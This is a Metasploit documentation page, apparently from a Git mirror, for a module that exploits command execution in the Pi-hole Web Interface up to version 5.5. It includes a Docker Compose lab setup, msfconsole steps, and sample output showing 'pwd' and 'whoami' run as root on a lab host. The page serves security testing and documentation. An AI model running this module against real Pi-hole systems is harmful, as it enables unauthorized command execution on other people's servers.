adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/admin/http/pihole_domains_api_exec.md
T
space-r7 bb00575acb add command for starting docker env
2022-01-11 17:07:36 -06:00

2.6 KiB
Raw Blame History

Vulnerable Application

This exploits a command execution in Pi-Hole Web Interface <= 5.5. The Settings > API/Web inetrace page contains the field Top Domains/Top Advertisers which is validated by a regex which does not properly filter system commands, which can then be executed by calling the gravity functionality. However, the regex only allows a-z, 0-9, _.

Docker Compose

Using the Docker compose file below, execute docker compose up -d to get a vulnerable environment running.

version: "3"

# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:v5.5
    ports:
      #- "53:53/tcp"
      #- "53:53/udp"
      #- "67:67/udp"
      - "192.168.2.199:80:80/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: ''
    # Volumes store your data between container upgrades
    volumes:
      - './etc-pihole/:/etc/pihole/'
      - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/admin/http/pihole_domains_api_exec
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get the output from the command.

Options

COMMAND

The command to run. This is VERY restrictive. Valid characters are 0-9, a-z, _. Ref. Defaults to pwd.

Scenarios

Pi-hole v5.2.4 with Web Interface 5.3.1 via Docker

[*] Processing pihole.rb for ERB directives.
resource (pihole.rb)> use auxiliary/admin/http/pihole_domains_api_exec
resource (pihole.rb)> set rhosts 192.168.2.199
rhosts => 192.168.2.199
resource (pihole.rb)> set verbose true
verbose => true
resource (pihole.rb)> run
[*] Running module against 192.168.2.199
[+] Web Interface Version Detected: 5.3.1
[*] Using token: YbGnWVA3ogVs0eLaKjEDGPaX8Zy1l5X3dxfHHSdy6r8=
[*] Sending payload request
[*] Forcing gravity pull
[+] /var/www/html/admin/scripts/pi-hole/php
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/pihole_domains_api_exec) > set command whoami
command => whoami
msf6 auxiliary(admin/http/pihole_domains_api_exec) > run
[*] Running module against 192.168.2.199

[+] Web Interface Version Detected: 5.3.1
[*] Using token: 9dtOO2bIndYSyJ1KsGYBa7pV5B4MToTQB1h2dmRfHk8=
[*] Sending payload request
[*] Forcing gravity pull
[+] root
[*] Auxiliary module execution completed
Reference in New Issue View Git Blame Copy Permalink